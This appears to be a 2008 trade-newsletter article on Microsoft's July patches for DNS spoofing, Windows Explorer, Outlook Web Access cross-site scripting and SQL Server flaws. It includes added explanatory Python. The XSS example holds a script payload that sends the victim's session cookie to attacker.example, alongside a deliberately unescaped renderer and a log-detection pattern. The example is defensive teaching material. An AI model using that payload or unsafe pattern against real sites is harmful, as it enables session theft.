Volume 6, Number 26 -- July 9, 2008

Microsoft Patches Security Flaws in Windows, SQL Server, and Exchange

Published: July 9, 2008

by Alex Woodie

Microsoft published four patches for nine security vulnerabilities in Windows and other products yesterday during its monthly Patch Tuesday event. All of the flaws carry the rating of "important," which is a step below "critical" in Microsoft's severity rating system. Nevertheless, newly disclosed flaws in Exchange Server and SQL Server could open the door to potentially harmful attacks from internal and external threats, and as such they should not be taken lightly.

Two flaws in Windows' implementation of the Domain Name System (DNS) protocol that could leave users open to spoofing attacks were patched with MS08-037. The flaws, which affect both the client and the server DNS components, could allow an attacker to redirect Internet traffic to locations of their choosing by sending specially crafted DNS packets to an affected Windows 2000, Windows XP, or Windows Server 2003 system. In practice that means forged DNS responses that the Windows resolver accepts and caches; the update makes the resolver's outgoing queries harder to predict, so a forged response is far less likely to match a query in flight. Microsoft says neither flaw had been publicly revealed before yesterday, and neither is being actively exploited in the wild. Dan Kaminsky of the computer security services firm IOActive is credited with discovering one of the flaws.
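As an added illustration (not code from Microsoft, IOActive, or this article), the script below builds and parses minimal DNS query packets and checks the one thing an off-path forger must guess besides the 16-bit transaction ID: whether the resolver's UDP source port is fixed, sequential, or random. The sample queries, the ports and the domain name are constructed; the port classification and the bit estimate are rough heuristics of this example's own, not Microsoft's test.

```python
"""Estimate how much an off-path attacker must guess to forge a DNS answer.

Added example, not Microsoft's code. Only the RFC 1035 header layout and the
matching rule (TXID + UDP source port + question) are taken from the real
protocol; the sample resolver behaviour below is constructed.
"""
import math
import random
import struct


def build_query(txid, qname, qtype=1):
    """Minimal RFC 1035 query: 12-byte header plus one question (class IN)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # flags: RD set
    labels = b"".join(
        bytes([len(p)]) + p.encode("ascii") for p in qname.rstrip(".").split(".")
    )
    return header + labels + b"\x00" + struct.pack("!HH", qtype, 1)


def parse_query(packet):
    """Return (txid, qname) from a DNS query: the fields a forger must match."""
    if len(packet) < 12:
        raise ValueError("truncated DNS header")
    txid, _flags, qdcount = struct.unpack("!HHH", packet[:6])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    pos, labels = 12, []
    while True:
        length = packet[pos]
        pos += 1
        if length == 0:
            break
        if length >= 0xC0:          # compression pointers are not valid in a query name
            raise ValueError("compressed name in question")
        labels.append(packet[pos:pos + length].decode("ascii"))
        pos += length
    return txid, ".".join(labels)


def classify_ports(ports):
    """Label the resolver's source-port behaviour seen across several queries."""
    if len(set(ports)) == 1:
        return "fixed"
    steps = {(b - a) % 65536 for a, b in zip(ports, ports[1:])}
    if steps == {1}:
        return "sequential"
    return "random"


def port_bits(ports):
    """Rough lower bound on the bits an attacker must guess for the port.
    A fixed or sequential port is predictable and contributes nothing."""
    if classify_ports(ports) in ("fixed", "sequential"):
        return 0.0
    return min(16.0, math.log2(max(ports) - min(ports) + 1))


def forgery_odds(ports):
    """Per-packet success chance of one spoofed answer against one outstanding
    query: the TXID is always 16 bits, the port adds whatever the resolver gives."""
    return 2.0 ** -(16 + port_bits(ports))


def report(samples):
    """samples: list of (udp_source_port, query_packet) as seen leaving a resolver."""
    ports = [p for p, _ in samples]
    txids = [parse_query(pkt)[0] for _, pkt in samples]
    return {
        "port_pattern": classify_ports(ports),
        "port_bits": port_bits(ports),
        "distinct_txids": len(set(txids)),
        "forgery_odds": forgery_odds(ports),
    }


# Constructed samples. Unpatched behaviour: every query leaves from one UDP port.
# Patched behaviour: a fresh ephemeral port per query, which is what the fix adds.
_rng = random.Random(2008)
_DOMAIN = "www.example.com"
UNPATCHED = [(1053, build_query(_rng.getrandbits(16), _DOMAIN)) for _ in range(32)]
PATCHED = [(_rng.randrange(49152, 65536), build_query(_rng.getrandbits(16), _DOMAIN))
           for _ in range(32)]

if __name__ == "__main__":
    for name, sample in (("unpatched", UNPATCHED), ("patched", PATCHED)):
        print(name, report(sample))
```

The point the numbers make: with a fixed port the attacker's search space is 2^16 transaction IDs, small enough to flood through in the window before the real answer arrives; random ports push it towards 2^32, which is the difference the update is meant to buy.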

A remote code execution vulnerability in Windows Vista and Windows Server 2008 was fixed with MS08-038. A flaw in the way Windows Explorer parses Windows Search saved-search files could enable an attacker to take complete control of a user's system by tricking the user into visiting a malicious Web site or opening a malicious file.

While remote code execution vulnerabilities are usually rated critical, in this case the User Account Control feature of Vista and Windows Server 2008, under which regular users run with fewer rights than an administrator, provides some protection: code that runs through this flaw gets only the rights of the logged-on user, so a non-administrator account limits the damage. The flaw had been publicly disclosed back in March, but Microsoft says it is not being actively exploited.

Two cross-site scripting flaws in Outlook Web Access (OWA) that could give an attacker full access to a victim's e-mail account have been addressed with MS08-039. Script injected through either flaw runs in the victim's authenticated OWA session, which is why Microsoft classes them as elevation of privilege vulnerabilities. They are present in OWA on Exchange Server 2003 Service Pack 2, Exchange Server 2007, and Exchange Server 2007 SP1. Neither flaw had previously been disclosed, nor has either been exploited in the wild, according to Microsoft. Michael Jordan of Context Information Security is credited with reporting the flaws.

The OWA flaws could open the door to greater riches for a hacker, according to Tyler Reguly, a security engineer with nCircle, a provider of network security solutions. "These vulnerabilities offer great opportunity for an attacker to snoop for additional information before attempting to breach a company’s network security," he says.
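The bug class behind MS08-039, and the kind of snooping Reguly describes, as an added illustration that is not OWA's code or anything from Microsoft or Context Information Security: a page that reflects a request value unescaped, beside its output-encoded form, and a small scan over access-log lines for the request shapes such probes leave behind. The payload, the log lines, the IP addresses and the OWA-style parameter names are all constructed for this example.

```python
"""Reflected XSS: the vulnerable pattern, the fix, and a log-side check.

Added example, not code from OWA or Microsoft. Hosts, log lines and the
OWA-style query parameters are constructed.
"""
import html
import re
from urllib.parse import unquote_plus

# A classic payload: ships the victim's session cookie to an attacker host.
PAYLOAD = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"


def render_unsafe(mailbox, subject):
    """Vulnerable pattern: user-controlled text dropped straight into HTML,
    so markup in `subject` becomes part of the page and runs as the victim."""
    return f"<h1>{mailbox}</h1><p>Subject: {subject}</p>"


def render_safe(mailbox, subject):
    """Hardened form: contextual output encoding. Every untrusted value is
    HTML-escaped (quotes included) before it enters element content."""
    return (f"<h1>{html.escape(mailbox, quote=True)}</h1>"
            f"<p>Subject: {html.escape(subject, quote=True)}</p>")


SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_live_script(page):
    """True if the rendered HTML still carries an unescaped <script> tag."""
    return SCRIPT_TAG.search(page) is not None


# Detection side: IIS-style (W3C) access log lines, constructed for this example.
LOG_LINES = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2008-07-09 14:02:11 10.0.0.7 GET /owa/ ae=Folder&t=IPF.Note 200
2008-07-09 14:02:45 198.51.100.9 GET /owa/ ae=Item&t=IPM.Note&id=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker.example%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E 200
2008-07-09 14:03:01 10.0.0.7 POST /owa/ev.owa oeh=1&ns=EditMessage&ev=Send 200
2008-07-09 14:03:30 198.51.100.9 GET /exchange/user/Inbox/ Cmd=contents&Page=1%22%20onmouseover%3D%22alert(document.cookie) 200
""".splitlines()

# Markers of script injection after URL-decoding: a script tag, a javascript:
# URL, or an injected event-handler attribute such as onmouseover=.
XSS_MARKERS = re.compile(r"<\s*/?\s*script\b|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)


def flag_xss_attempts(lines):
    """Return (client_ip, uri_stem, matched_marker) for each suspicious request.
    The query string is URL-decoded once before matching; double-encoded
    probes would need a second decode pass."""
    hits = []
    for line in lines:
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        _date, _time, client, _method, stem, query, _status = fields[:7]
        match = XSS_MARKERS.search(unquote_plus(query))
        if match:
            hits.append((client, stem, match.group(0)))
    return hits


if __name__ == "__main__":
    print("unsafe page runs script:", contains_live_script(render_unsafe("alice", PAYLOAD)))
    print("safe page runs script:  ", contains_live_script(render_safe("alice", PAYLOAD)))
    for hit in flag_xss_attempts(LOG_LINES):
        print("suspicious request:", hit)
```

The hardened renderer is the fix a vendor ships; the log scan is what an operator can do today, before or after patching, to see whether anyone has been probing the OWA front end with script in the query string.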

The final patch, MS08-040, addresses four elevation of privilege flaws in all recent versions of SQL Server: SQL Server 7.0, SQL Server 2000, and SQL Server 2005, along with the Microsoft Data Engine (MSDE) 1.0, MSDE 2000, SQL Server 2000 Desktop Engine (WMSDE), and the Windows Internal Database (WYukon).

All four SQL Server vulnerabilities require the attacker to be authenticated. For the Memory Page Reuse vulnerability, the attacker must already hold operator-level privileges, or have access to backups or logs. For the other three, the attacker needs a valid Windows logon or the ability to submit SQL statements to the server.

Nevertheless, with three of the flaws, an attacker who successfully exploited the vulnerability would gain complete control over the database, a catastrophic event from a security point of view. However, an outside attacker would first need working credentials, and most organizations take pains to shield their databases from external access, so the more realistic exposure is to users who already have a logon.

Microsoft has traditionally focused on protecting its products from unauthenticated, external attacks. But the SQL vulnerabilities could indicate it has a bigger problem with internal threats than it first appeared, according to Reguly. "I wonder if perhaps Microsoft is failing to pay close enough attention to the authenticated vulnerabilities," he says. "This could mean there is, perhaps, a larger attack surface for insider threats than there is for outside attackers."

According to Don Leatham, director of solutions and strategy at patch management vendor Lumension Security, the potential harm from the SQL Server and Exchange Server flaws should not be underestimated.

"Both of these products can be high-value targets and these vulnerabilities could be considered critical depending on the organization," he says. "Many corporations hold not only their basic business information, but also their customer/patient data and critical intellectual property in Microsoft SQL Server databases, or transmit these types of data via Microsoft Exchange servers. Companies that depend heavily on SQL and Exchange servers to manage and store customer or patient data and intellectual property should evaluate the criticality of these updates and possibly address them as a critical level security update."


Sponsored By

Meet Your IT Audit and Compliance Demands with MKS

One Seamless Solution for System i and Distributed Application Lifecycle Management

Are you struggling to meet IT audit and compliance demands?
Do you need traceability over software change?

When Pennsylvania Housing Finance Agency (PHFA) needed to achieve compliance, they turned to MKS for traceability over their software change. MKS Integrity enforces their development process and brings end to end traceability to their System i and distributed development operations.

Read the PHFA story.

MKS can help you establish and enforce any software process or workflow, and manage software change from project start to finish. With MKS you can ensure that the application you develop is deployed securely and that only authorized changes go into production.

For auditing and compliance needs, it doesn't get any better than MKS.

For more info, visit or call 1 800 613 7535.

Make the Move to MKS now and SAVE!

For a limited time MKS will help you make the move from your existing software change and configuration management solution, with special pricing when you purchase Implementer with MKS Integrity - giving you integrated workflow, complete audit trails and coverage of the application lifecycle as well as a platform to manage both System i and cross-platform development.

Visit the Products section of for more information on Implementer and MKS Integrity.

Click here to request more information on our time limited "change up" offer.

The time is now to make the switch.

Call MKS today at 1-800-613-7535 to discuss your options, and while you're at it,
request a FREE change management process assessment by our team of experts
with over 40 years of experience in the midrange market.

Contact MKS Sales at 1-800-613-7535 or

Editor: Alex Woodie
Contributing Editors: Dan Burger, Joe Hertvik,
Shannon O'Donnell, Timothy Prickett Morgan
Publisher and Advertising Director: Jenny Thomas
Advertising Sales Representative: Kim Reed
Contact the Editors: To contact anyone on the IT Jungle Team
Go to our contacts page and send us a message.

Subscription Information:
You can unsubscribe, change your email address, or sign up for any of IT Jungle's free e-newsletters through our Web site at

Copyright © 1996-2008 Guild Companies, Inc. All Rights Reserved.
Guild Companies, Inc., 50 Park Terrace East, Suite 8F, New York, NY 10034

Privacy Statement